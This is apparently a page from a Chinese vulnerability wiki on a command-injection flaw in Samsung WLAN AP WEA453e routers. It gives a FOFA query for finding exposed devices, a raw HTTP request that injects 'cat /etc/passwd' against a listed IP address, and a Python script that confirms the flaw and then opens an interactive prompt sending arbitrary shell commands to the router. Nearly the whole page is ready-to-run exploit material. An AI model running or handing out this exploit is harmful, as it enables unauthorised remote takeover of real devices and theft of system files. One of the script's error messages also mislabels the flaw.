免费、自由、人人可编辑的漏洞库
,
FOFA
title=="Samsung WLAN AP"
漏洞利用
发生以下请求:
POST /(download)/tmp/a.txt HTTP/1.1 Host: 175.199.182.152 Connection: close Content-Length: 48 command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
POC
import requests import sys import random import re import base64 import time from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m') print('+ \03334mGithub : https://github.com/PeiQi0 \0330m') print('+ \03334m公众号 : PeiQi文库 \0330m') print('+ \03334mVersion: 三星 WLAN AP WEA453e路由器 \0330m') print('+ \03336m使用格式: python3 poc.py \0330m') print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx \0330m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/(download)/tmp/a.txt" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } data = "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) if "root" in response.text and response.status_code == 200: print("\03336mo 目标 {} 存在漏洞, 响应为:\n{}\0330m".format(target_url, response.text)) while True: cmd = str(input("\03335mCmd >>> \0330m")) POC_2(target_url, cmd) else: print("\03331mx 目标 {} 不存在默认管理员弱口令 \0330m".format(target_url)) except Exception as e: print("\03331mx 请求失败 \0330m", e) def POC_2(target_url, cmd): vuln_url = target_url + "/(download)/tmp/a.txt" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } data = "command1=shell:{}| dd of=/tmp/a.txt".format(cmd) try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) print("\03336m{} \0330m".format(response.text)) except Exception as e: print("\03331mx 请求失败 \0330m", e) if __name__ == '__main__': title() target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m")) POC_1(target_url)
PWNWIK.COM